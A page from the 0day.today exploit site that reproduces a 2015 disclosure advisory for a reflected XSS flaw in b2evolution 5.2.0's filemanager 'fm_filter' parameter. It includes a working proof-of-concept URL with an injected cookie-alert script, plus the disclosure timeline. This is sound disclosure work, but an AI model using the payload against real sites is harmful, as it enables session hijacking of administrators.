0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
CMS b2evolution 5.2.0 Cross Site Scripting Vulnerability
Advisory: Reflecting XSS vulnerability in CMS filemanager of b2evolution v. 5.2.0 Author: Steffen Rösemann Affected Software: CMS b2evolution v. 5.2.0 (Release-Date: 6th-Dec-2014) Vendor URL: http://b2evolution.net/ Vendor Status: did not respond to issue CVE-ID: - ========================== Vulnerability Description: ========================== The filemanager of b2evolution v. 5.2.0 is prone to reflecting XSS attacks. ================== Technical Details: ================== By appending aribitrary HTML- and/or JavaScriptcode to the "fm_filter" parameter of the URL where the filemanager functionality of b2eveolution is located, an attacker could trick an authenticated administrative user to execute the code. Filemanager is located here on a common b2evolution installation: http:// {TARGET}/blogs/admin.php?fm_filter=&actionArray[filter]=Apply&ctrl=files&locale=&blog=1&mode=&ajax_request=0&root=collection_1&path=&fm_mode=&linkctrl=&linkdata=&iframe_name=&fm_hide_dirtree=0&fm_flatmode=&fm_order=&fm_orderasc= Exploit-Example: http:// {TARGET}/blogs/admin.php?fm_filter=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&actionArray[filter]=Apply&ctrl=files&locale=&blog=1&mode=&ajax_request=0&root=collection_1&path=&fm_mode=&linkctrl=&linkdata=&iframe_name=&fm_hide_dirtree=0&fm_flatmode=&fm_order=&fm_orderasc= ========= Solution: ========= Vendor did not respond and submitted no solution. ==================== Disclosure Timeline: ==================== 30-Dec-2014 – found the vulnerability 30-Dec-2014 - informed the developers (incl. announcement to release technical details on 13th Jan 2015 if there is no response) 30-Dec-2014 – release date of this security advisory [without technical details] 13-Jan-2015 - vendor did not respond 13-Jan-2015 - release date of this security advisory 13-Jan-2015 - send to lists ======== Credits: ======== Vulnerability found and advisory written by Steffen Rösemann. =========== References: =========== [1] http://b2evolution.net/ [2] http://sroesemann.blogspot.de/2014/12/sroeadv-2014-09.html [3] http://sroesemann.blogspot.de/2015/01/report-for-advisory-sroeadv-2014-09.html # 0day.today [2024-12-25] #